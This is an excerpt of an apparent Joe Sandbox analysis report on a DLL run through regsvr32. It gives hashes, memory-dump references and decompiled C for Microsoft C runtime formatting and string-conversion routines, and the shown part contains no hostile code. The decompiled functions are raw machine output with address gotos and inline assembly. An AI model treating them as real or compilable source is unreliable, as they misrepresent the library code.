                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                                                                                                            • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 4023976971-2293733425
                                                                                                                                            • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                                                                            • Instruction ID: 761ebb5b08646f8d4be362cc959a20534b6d49df616f7233e1bf982953e66f09
                                                                                                                                            • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                                                                            • Instruction Fuzzy Hash: 3102577290C69ADAE7748F10E5443AEB7A4FB84B44F600935D28C86AE8DF7CE545CF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                                                                            • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                                                                                                            • API String ID: 530996419-3695252689
                                                                                                                                            • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                                                                            • Instruction ID: c47728b9711cacc85ce21121faab4a1f91a84806d94ac188d55927d2bd8f709c
                                                                                                                                            • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                                                                            • Instruction Fuzzy Hash: D2D11A3251CB99C5D6649F15E4403AEB7A0FB84B90F205A36E69E83BE9DF3CD484CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                                                                                                            • API String ID: 2192614184-1854130327
                                                                                                                                            • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                                                                            • Instruction ID: 0d2e824a416e529992eb3ada02595d08d8469a5d7cd9902ed60bb2e84aef4f42
                                                                                                                                            • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                                                                            • Instruction Fuzzy Hash: 1EC1053290CA9AD6F7649F10E5447AEB6A0FB84B44F604935E28D83AD9CF7DE444CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2192614184-1870338870
                                                                                                                                            • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                                                                            • Instruction ID: f165bd855feda91a0294f2c34d1916493159b665101dcf9a6652374d2cfcb0e5
                                                                                                                                            • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                                                                            • Instruction Fuzzy Hash: CAD1387290CA9ADAE774DF10E5443AAB6A0FB84748F600935D68D87AD8DF7DD045CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 19%
                                                                                                                                            			E00007FFC7FFC65D0C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                                                                            				signed int _t223;
                                                                                                                                            				signed char _t228;
                                                                                                                                            				intOrPtr _t263;
                                                                                                                                            				signed int _t338;
                                                                                                                                            				signed int _t339;
                                                                                                                                            				signed long long _t342;
                                                                                                                                            				intOrPtr* _t365;
                                                                                                                                            				signed long long _t390;
                                                                                                                                            
                                                                                                                                            				_t338 = __rax;
                                                                                                                                            				_a80 = _a80 | 0x00000040;
                                                                                                                                            				_a72 = 0xa;
                                                                                                                                            				_a72 = 0xa;
                                                                                                                                            				_a116 = 0x10;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				_a708 = 7;
                                                                                                                                            				_a708 = 0x27;
                                                                                                                                            				_a72 = 0x10;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0c754;
                                                                                                                                            				_a84 = 0x30;
                                                                                                                                            				_a85 = _a708 + 0x51;
                                                                                                                                            				_a92 = 2;
                                                                                                                                            				_a72 = 8;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0c777;
                                                                                                                                            				asm("bts eax, 0x9");
                                                                                                                                            				if ((_a80 & 0x00008000) == 0) goto 0x65d0c79e;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1112);
                                                                                                                                            				_a824 = _t338;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00001000) == 0) goto 0x65d0c7c5;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1112);
                                                                                                                                            				_a824 = _t338;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00000020) == 0) goto 0x65d0c810;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c7f6;
                                                                                                                                            				_t339 = E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t339;
                                                                                                                                            				goto 0x65d0c80e;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t339;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c834;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t339;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t339;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c882;
                                                                                                                                            				if (_a824 >= 0) goto 0x65d0c882;
                                                                                                                                            				_a832 =  ~_a824;
                                                                                                                                            				asm("bts eax, 0x8");
                                                                                                                                            				goto 0x65d0c892;
                                                                                                                                            				_t342 = _a824;
                                                                                                                                            				_a832 = _t342;
                                                                                                                                            				if ((_a80 & 0x00008000) != 0) goto 0x65d0c8c7;
                                                                                                                                            				if ((_a80 & 0x00001000) != 0) goto 0x65d0c8c7;
                                                                                                                                            				_a832 = _a832 & _t342;
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0c8d8;
                                                                                                                                            				_a116 = 1;
                                                                                                                                            				goto 0x65d0c8f5;
                                                                                                                                            				_a80 = _a80 & 0xfffffff7;
                                                                                                                                            				if (_a116 - 0x200 <= 0) goto 0x65d0c8f5;
                                                                                                                                            				_a116 = 0x200;
                                                                                                                                            				if (_a832 != 0) goto 0x65d0c908;
                                                                                                                                            				_a92 = 0;
                                                                                                                                            				_a64 =  &_a687;
                                                                                                                                            				_t223 = _a116;
                                                                                                                                            				_a116 = _a116 - 1;
                                                                                                                                            				if (_t223 > 0) goto 0x65d0c936;
                                                                                                                                            				if (_a832 == 0) goto 0x65d0c9d3;
                                                                                                                                            				_a1040 = _a72;
                                                                                                                                            				_a816 = _t223 / _a1040 + 0x30;
                                                                                                                                            				_a1048 = _a72;
                                                                                                                                            				if (_a816 - 0x39 <= 0) goto 0x65d0c9b2;
                                                                                                                                            				_t228 = _a816 + _a708;
                                                                                                                                            				_a816 = _t228;
                                                                                                                                            				 *_a64 = _a816 & 0x000000ff;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				goto 0x65d0c915;
                                                                                                                                            				_a104 = _t228;
                                                                                                                                            				_a64 = _a64 + 1;
                                                                                                                                            				if ((_a80 & 0x00000200) == 0) goto 0x65d0ca31;
                                                                                                                                            				if (_a104 == 0) goto 0x65d0ca12;
                                                                                                                                            				if ( *_a64 == 0x30) goto 0x65d0ca31;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				 *_a64 = 0x30;
                                                                                                                                            				_a104 = _a104 + 1;
                                                                                                                                            				if (_a108 != 0) goto 0x65d0cc6e;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000100) == 0) goto 0x65d0ca63;
                                                                                                                                            				_a84 = 0x2d;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000001) == 0) goto 0x65d0ca7d;
                                                                                                                                            				_a84 = 0x2b;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000002) == 0) goto 0x65d0ca95;
                                                                                                                                            				_a84 = 0x20;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				_a840 = _a88 - _a104 - _a92;
                                                                                                                                            				if ((_a80 & 0x0000000c) != 0) goto 0x65d0cad5;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x20, _a840, _a1088,  &_a688);
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                                                                            				if ((_a80 & 0x00000008) == 0) goto 0x65d0cb27;
                                                                                                                                            				if ((_a80 & 0x00000004) != 0) goto 0x65d0cb27;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x30, _a840, _a1088,  &_a688);
                                                                                                                                            				if (_a76 == 0) goto 0x65d0cc1d;
                                                                                                                                            				if (_a104 <= 0) goto 0x65d0cc1d;
                                                                                                                                            				_a872 = 0;
                                                                                                                                            				_a848 = _a64;
                                                                                                                                            				_a856 = _a104;
                                                                                                                                            				_a856 = _a856 - 1;
                                                                                                                                            				if (_a856 == 0) goto 0x65d0cc1b;
                                                                                                                                            				_a1056 =  *_a848 & 0x0000ffff;
                                                                                                                                            				r9d = _a1056 & 0x0000ffff;
                                                                                                                                            				r8d = 6;
                                                                                                                                            				_a872 = E00007FFC7FFC65D0B530( &_a860,  &_a864, _a1088);
                                                                                                                                            				_a848 =  &(_a848[1]);
                                                                                                                                            				if (_a872 != 0) goto 0x65d0cbe5;
                                                                                                                                            				if (_a860 != 0) goto 0x65d0cbf2;
                                                                                                                                            				_a688 = 0xffffffff;
                                                                                                                                            				goto 0x65d0cc1b;
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                                                                            				goto 0x65d0cb60;
                                                                                                                                            				goto 0x65d0cc3b;
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                                                                            				if (_a688 < 0) goto 0x65d0cc6e;
                                                                                                                                            				if ((_a80 & 0x00000004) == 0) goto 0x65d0cc6e;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x20, _a840, _a1088,  &_a688);
                                                                                                                                            				if (_a96 == 0) goto 0x65d0cc8e;
                                                                                                                                            				0x65cf5330();
                                                                                                                                            				_a96 = 0;
                                                                                                                                            				goto 0x65d0b99c;
                                                                                                                                            				if (_a704 == 0) goto 0x65d0ccb4;
                                                                                                                                            				if (_a704 == 7) goto 0x65d0ccb4;
                                                                                                                                            				_a1060 = 0;
                                                                                                                                            				goto 0x65d0ccbf;
                                                                                                                                            				_a1060 = 1;
                                                                                                                                            				_t263 = _a1060;
                                                                                                                                            				_a876 = _t263;
                                                                                                                                            				if (_a876 != 0) goto 0x65d0cd05;
                                                                                                                                            				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                                                                            				_a32 = _t365;
                                                                                                                                            				r9d = 0;
                                                                                                                                            				r8d = 0x8f5;
                                                                                                                                            				0x65cfb3b0();
                                                                                                                                            				if (_t263 != 1) goto 0x65d0cd05;
                                                                                                                                            				asm("int3");
                                                                                                                                            				if (_a876 != 0) goto 0x65d0cd61;
                                                                                                                                            				0x65cfab30();
                                                                                                                                            				 *_t365 = 0x16;
                                                                                                                                            				_a32 = 0;
                                                                                                                                            				r9d = 0x8f5;
                                                                                                                                            				E00007FFC7FFC65CFBD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            				_a912 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				goto 0x65d0cd80;
                                                                                                                                            				_a916 = _a688;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				return E00007FFC7FFC65CF3280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            			}











                                                                                                                                            0x7ffc65d0c6d6
                                                                                                                                            0x7ffc65d0c6dd
                                                                                                                                            0x7ffc65d0c6e1
                                                                                                                                            0x7ffc65d0c6ee
                                                                                                                                            0x7ffc65d0c6f8
                                                                                                                                            0x7ffc65d0c704
                                                                                                                                            0x7ffc65d0c70c
                                                                                                                                            0x7ffc65d0c719
                                                                                                                                            0x7ffc65d0c724
                                                                                                                                            0x7ffc65d0c737
                                                                                                                                            0x7ffc65d0c739
                                                                                                                                            0x7ffc65d0c748
                                                                                                                                            0x7ffc65d0c74c
                                                                                                                                            0x7ffc65d0c756
                                                                                                                                            0x7ffc65d0c769
                                                                                                                                            0x7ffc65d0c76f
                                                                                                                                            0x7ffc65d0c782
                                                                                                                                            0x7ffc65d0c78c
                                                                                                                                            0x7ffc65d0c791
                                                                                                                                            0x7ffc65d0c799
                                                                                                                                            0x7ffc65d0c7a9
                                                                                                                                            0x7ffc65d0c7b3
                                                                                                                                            0x7ffc65d0c7b8
                                                                                                                                            0x7ffc65d0c7c0
                                                                                                                                            0x7ffc65d0c7ce
                                                                                                                                            0x7ffc65d0c7d9
                                                                                                                                            0x7ffc65d0c7e8
                                                                                                                                            0x7ffc65d0c7ec
                                                                                                                                            0x7ffc65d0c7f4
                                                                                                                                            0x7ffc65d0c7fe
                                                                                                                                            0x7ffc65d0c806
                                                                                                                                            0x7ffc65d0c80e
                                                                                                                                            0x7ffc65d0c819
                                                                                                                                            0x7ffc65d0c823
                                                                                                                                            0x7ffc65d0c82a
                                                                                                                                            0x7ffc65d0c832
                                                                                                                                            0x7ffc65d0c83c
                                                                                                                                            0x7ffc65d0c843
                                                                                                                                            0x7ffc65d0c854
                                                                                                                                            0x7ffc65d0c85f
                                                                                                                                            0x7ffc65d0c86c
                                                                                                                                            0x7ffc65d0c878
                                                                                                                                            0x7ffc65d0c880
                                                                                                                                            0x7ffc65d0c882
                                                                                                                                            0x7ffc65d0c88a
                                                                                                                                            0x7ffc65d0c89d
                                                                                                                                            0x7ffc65d0c8aa
                                                                                                                                            0x7ffc65d0c8bf
                                                                                                                                            0x7ffc65d0c8cc
                                                                                                                                            0x7ffc65d0c8ce
                                                                                                                                            0x7ffc65d0c8d6
                                                                                                                                            0x7ffc65d0c8df
                                                                                                                                            0x7ffc65d0c8eb
                                                                                                                                            0x7ffc65d0c8ed
                                                                                                                                            0x7ffc65d0c8fe
                                                                                                                                            0x7ffc65d0c900
                                                                                                                                            0x7ffc65d0c910
                                                                                                                                            0x7ffc65d0c915
                                                                                                                                            0x7ffc65d0c91f
                                                                                                                                            0x7ffc65d0c925
                                                                                                                                            0x7ffc65d0c930
                                                                                                                                            0x7ffc65d0c93b
                                                                                                                                            0x7ffc65d0c95e
                                                                                                                                            0x7ffc65d0c96a
                                                                                                                                            0x7ffc65d0c997
                                                                                                                                            0x7ffc65d0c9a9
                                                                                                                                            0x7ffc65d0c9ab
                                                                                                                                            0x7ffc65d0c9bf
                                                                                                                                            0x7ffc65d0c9c9
                                                                                                                                            0x7ffc65d0c9ce
                                                                                                                                            0x7ffc65d0c9e0
                                                                                                                                            0x7ffc65d0c9ec
                                                                                                                                            0x7ffc65d0c9fc
                                                                                                                                            0x7ffc65d0ca03
                                                                                                                                            0x7ffc65d0ca10
                                                                                                                                            0x7ffc65d0ca1a
                                                                                                                                            0x7ffc65d0ca24
                                                                                                                                            0x7ffc65d0ca2d
                                                                                                                                            0x7ffc65d0ca36
                                                                                                                                            0x7ffc65d0ca45
                                                                                                                                            0x7ffc65d0ca52
                                                                                                                                            0x7ffc65d0ca54
                                                                                                                                            0x7ffc65d0ca59
                                                                                                                                            0x7ffc65d0ca61
                                                                                                                                            0x7ffc65d0ca6c
                                                                                                                                            0x7ffc65d0ca6e
                                                                                                                                            0x7ffc65d0ca73
                                                                                                                                            0x7ffc65d0ca7b
                                                                                                                                            0x7ffc65d0ca86
                                                                                                                                            0x7ffc65d0ca88
                                                                                                                                            0x7ffc65d0ca8d
                                                                                                                                            0x7ffc65d0caa5
                                                                                                                                            0x7ffc65d0cab5
                                                                                                                                            0x7ffc65d0cad0
                                                                                                                                            0x7ffc65d0caee
                                                                                                                                            0x7ffc65d0cafc
                                                                                                                                            0x7ffc65d0cb07
                                                                                                                                            0x7ffc65d0cb22
                                                                                                                                            0x7ffc65d0cb2c
                                                                                                                                            0x7ffc65d0cb37
                                                                                                                                            0x7ffc65d0cb3d
                                                                                                                                            0x7ffc65d0cb4d
                                                                                                                                            0x7ffc65d0cb59
                                                                                                                                            0x7ffc65d0cb70
                                                                                                                                            0x7ffc65d0cb79
                                                                                                                                            0x7ffc65d0cb8a
                                                                                                                                            0x7ffc65d0cb92
                                                                                                                                            0x7ffc65d0cb9b
                                                                                                                                            0x7ffc65d0cbb6
                                                                                                                                            0x7ffc65d0cbc9
                                                                                                                                            0x7ffc65d0cbd9
                                                                                                                                            0x7ffc65d0cbe3
                                                                                                                                            0x7ffc65d0cbe5
                                                                                                                                            0x7ffc65d0cbf0
                                                                                                                                            0x7ffc65d0cc11
                                                                                                                                            0x7ffc65d0cc16
                                                                                                                                            0x7ffc65d0cc1b
                                                                                                                                            0x7ffc65d0cc36
                                                                                                                                            0x7ffc65d0cc43
                                                                                                                                            0x7ffc65d0cc4e
                                                                                                                                            0x7ffc65d0cc69
                                                                                                                                            0x7ffc65d0cc74
                                                                                                                                            0x7ffc65d0cc80
                                                                                                                                            0x7ffc65d0cc85
                                                                                                                                            0x7ffc65d0cc8e
                                                                                                                                            0x7ffc65d0cc9b
                                                                                                                                            0x7ffc65d0cca5
                                                                                                                                            0x7ffc65d0cca7
                                                                                                                                            0x7ffc65d0ccb2
                                                                                                                                            0x7ffc65d0ccb4
                                                                                                                                            0x7ffc65d0ccbf
                                                                                                                                            0x7ffc65d0ccc6
                                                                                                                                            0x7ffc65d0ccd5
                                                                                                                                            0x7ffc65d0ccd7
                                                                                                                                            0x7ffc65d0ccde
                                                                                                                                            0x7ffc65d0cce3
                                                                                                                                            0x7ffc65d0cce6
                                                                                                                                            0x7ffc65d0ccf8
                                                                                                                                            0x7ffc65d0cd00
                                                                                                                                            0x7ffc65d0cd02
                                                                                                                                            0x7ffc65d0cd0d
                                                                                                                                            0x7ffc65d0cd0f
                                                                                                                                            0x7ffc65d0cd14
                                                                                                                                            0x7ffc65d0cd1a
                                                                                                                                            0x7ffc65d0cd23
                                                                                                                                            0x7ffc65d0cd3e
                                                                                                                                            0x7ffc65d0cd43
                                                                                                                                            0x7ffc65d0cd53
                                                                                                                                            0x7ffc65d0cd5f
                                                                                                                                            0x7ffc65d0cd68
                                                                                                                                            0x7ffc65d0cd74
                                                                                                                                            0x7ffc65d0cd97

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: get_int64_arg$wctomb_s
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2984758162-268265396
                                                                                                                                            • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                                                                            • Instruction ID: 90da7c29db796ea69dc8c0c16555b363f71193c72f8bdeb71c628d9b65e0d1ed
                                                                                                                                            • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                                                                            • Instruction Fuzzy Hash: DA02057260CAD9CAE775CF14E5803AAB7A4E784B54F200535E68C86AE8DF7CE540CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                                                                                                            • API String ID: 2192614184-660564692
                                                                                                                                            • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                                                                            • Instruction ID: 2a0fc06d4b52cd2f98a18c61a067f981fccaaba42b199930cf55b7d76fad806f
                                                                                                                                            • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                                                                            • Instruction Fuzzy Hash: 5EE1283290CBDAD5E6749F14E1443AEA3A0FB84B54F604A35D69D43AD9DF7CE484CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                            			E00007FFC7FFC65D055F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                                                                                                                            				long long _v24;
                                                                                                                                            				long long _v32;
                                                                                                                                            				long long _v40;
                                                                                                                                            				long long _v48;
                                                                                                                                            				long long _v56;
                                                                                                                                            				void* _v64;
                                                                                                                                            				long long _v72;
                                                                                                                                            				void* _t88;
                                                                                                                                            				void* _t89;
                                                                                                                                            				void* _t107;
                                                                                                                                            				void* _t109;
                                                                                                                                            				signed int* _t158;
                                                                                                                                            				signed int* _t160;
                                                                                                                                            				long long _t175;
                                                                                                                                            				long long _t186;
                                                                                                                                            				signed int* _t187;
                                                                                                                                            				signed int* _t193;
                                                                                                                                            
                                                                                                                                            				_a32 = __r9;
                                                                                                                                            				_a24 = __r8;
                                                                                                                                            				_a16 = __rdx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				_v72 = 0;
                                                                                                                                            				_t158 = _a24;
                                                                                                                                            				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0x65d05639;
                                                                                                                                            				_t89 = E00007FFC7FFC65CFE680(_t88, _t158);
                                                                                                                                            				_v56 = _t158 + _a24[1];
                                                                                                                                            				goto 0x65d05642;
                                                                                                                                            				_v56 = 0;
                                                                                                                                            				if (_v56 == 0) goto 0x65d056aa;
                                                                                                                                            				_t160 = _a24;
                                                                                                                                            				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0x65d05673;
                                                                                                                                            				E00007FFC7FFC65CFE680(_t89, _t160);
                                                                                                                                            				_v48 = _t160 + _a24[1];
                                                                                                                                            				goto 0x65d0567c;
                                                                                                                                            				_v48 = 0;
                                                                                                                                            				if ( *((char*)(_v48 + 0x10)) == 0) goto 0x65d056aa;
                                                                                                                                            				if (_a24[2] != 0) goto 0x65d056b1;
                                                                                                                                            				if (( *_a24 & 0x80000000) != 0) goto 0x65d056b1;
                                                                                                                                            				goto 0x65d05966;
                                                                                                                                            				if (( *_a24 & 0x80000000) == 0) goto 0x65d056d0;
                                                                                                                                            				_v64 = _a16;
                                                                                                                                            				goto 0x65d056e9;
                                                                                                                                            				_v64 = _a24[2] +  *_a16;
                                                                                                                                            				if (( *_a24 & 0x00000008) == 0) goto 0x65d05765;
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x65d0575b;
